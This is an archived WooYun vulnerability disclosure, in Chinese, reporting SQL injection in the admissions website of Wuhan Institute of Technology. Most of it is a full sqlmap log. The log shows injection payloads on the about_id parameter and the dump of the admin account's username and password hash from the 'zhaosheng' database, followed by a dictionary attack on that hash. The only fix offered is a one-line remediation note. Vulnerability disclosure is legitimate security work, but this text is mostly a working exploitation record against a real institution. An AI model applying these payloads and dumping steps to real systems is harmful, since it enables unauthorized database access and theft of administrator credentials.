乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-30: 细节已通知厂商并且等待厂商处理中 2015-11-04: 厂商已经主动忽略漏洞,细节向公众公开
武汉工程大学招生信息网存在Sql注入漏洞,可以拿到最高管理员账号
武汉工程大学招生信息网(http://**.**.**.**:8081/)存在Sql注入漏洞通过Sql注入可以拿到最高管理员账号
Sql注入点:http://**.**.**.**:8081/about.jsp?about_id=21
$python sqlmap.py -u "http://**.**.**.**:8081/about.jsp?about_id=21"[16:52:42] [INFO] using 'D:\Documents\Desktop\sqlmap\output\**.**.**.**\session' as session file[16:52:42] [INFO] testing connection to the target url[16:52:42] [INFO] testing if the url is stable, wait a few seconds[16:52:43] [INFO] url is stable[16:52:43] [INFO] testing if GET parameter 'about_id' is dynamic[16:52:43] [INFO] confirming that GET parameter 'about_id' is dynamic[16:52:43] [INFO] GET parameter 'about_id' is dynamic[16:52:43] [INFO] heuristic test shows that GET parameter 'about_id' might be injectable (possible DBMS: MySQL)[16:52:43] [INFO] testing sql injection on GET parameter 'about_id'[16:52:43] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'[16:52:43] [INFO] GET parameter 'about_id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable[16:52:43] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'[16:52:46] [INFO] GET parameter 'about_id' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable[16:52:46] [INFO] testing 'MySQL > 5.0.11 stacked queries'[16:52:46] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'[16:53:10] [INFO] GET parameter 'about_id' is 'MySQL > 5.0.11 AND time-based blind' injectable[16:53:10] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'[16:53:10] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'GET parameter 'about_id' is vulnerable. Do you want to keep testing the others? [y/N] Nsqlmap identified the following injection points with a total of 29 HTTP(s) requests:---Place: GETParameter: about_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: about_id=21 AND 4339=4339 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: about_id=21 AND (SELECT 1114 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,117,98,58),(SELECT (CASE WHEN (1114=1114) THEN 1 ELSE 0 END)),CHAR(58,115,100,119,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: about_id=21 AND SLEEP(5)---[17:01:09] [INFO] the back-end DBMS is MySQLweb application technology: JSPback-end DBMS: MySQL 5.0[17:01:09] [WARNING] HTTP error codes detected during testing:500 (Internal Server Error) - 25 times[17:01:09] [INFO] Fetched data logged to text files under 'D:\Documents\Desktop\sqlmap\output\**.**.**.**'[*] shutting down at: 17:01:09python sqlmap.py -u "http://**.**.**.**:8081/about.jsp?about_id=21" -D zhaosheng -T admin -C charge,id,password,username --dump[*] starting at: 17:02:16[17:02:16] [INFO] using 'D:\Documents\Desktop\sqlmap\output\**.**.**.**\session' as session file[17:02:16] [INFO] resuming injection data from session file[17:02:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file[17:02:16] [INFO] testing connection to the target urlsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: about_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: about_id=21 AND 4339=4339 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: about_id=21 AND (SELECT 1114 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,117,98,58),(SELECT (CASE WHEN (1114=1114) THEN 1 ELSE 0 END)),CHAR(58,115,100,119,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: about_id=21 AND SLEEP(5)---[17:02:16] [INFO] the back-end DBMS is MySQLweb application technology: JSPback-end DBMS: MySQL 5.0[17:02:16] [INFO] fetching columns 'charge, id, password, username' entries for table 'admin' on database 'zhaosheng'[17:02:16] [INFO] the SQL query used returns 1 entries[17:02:16] [INFO] retrieved: 3[17:02:16] [INFO] retrieved: 4[17:02:16] [INFO] retrieved: ********************************[17:02:16] [INFO] retrieved: adminrecognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] Y[17:02:19] [INFO] using hash method: 'md5_generic_passwd'what's the dictionary's location? [D:\Documents\Desktop\sqlmap\txt\wordlist.txt][17:02:20] [INFO] loading dictionary from: 'D:\Documents\Desktop\sqlmap\txt\wordlist.txt'do you want to use common password suffixes? (slow!) [y/N] N[17:02:23] [INFO] starting dictionary attack (md5_generic_passwd)[17:02:23] [WARNING] no clear password(s) foundDatabase: zhaoshengTable: admin[1 entry]+--------+----+----------------------------------+----------+| charge | id | password | username |+--------+----+----------------------------------+----------+| 3 | 4 | ******************************** | admin |+--------+----+----------------------------------+----------+[17:02:23] [INFO] Table 'zhaosheng.admin' dumped to CSV file 'D:\Documents\Desktop\sqlmap\output\**.**.**.**\dump\zhaosheng\admin.csv'[17:02:23] [WARNING] HTTP error codes detected during testing:500 (Internal Server Error) - 5 times[17:02:23] [INFO] Fetched data logged to text files under 'D:\Documents\Desktop\sqlmap\output\**.**.**.**'
对导航链接和文章链接进行Sql过滤处理
危害等级:无影响厂商忽略
忽略时间:2015-11-04 11:04
暂无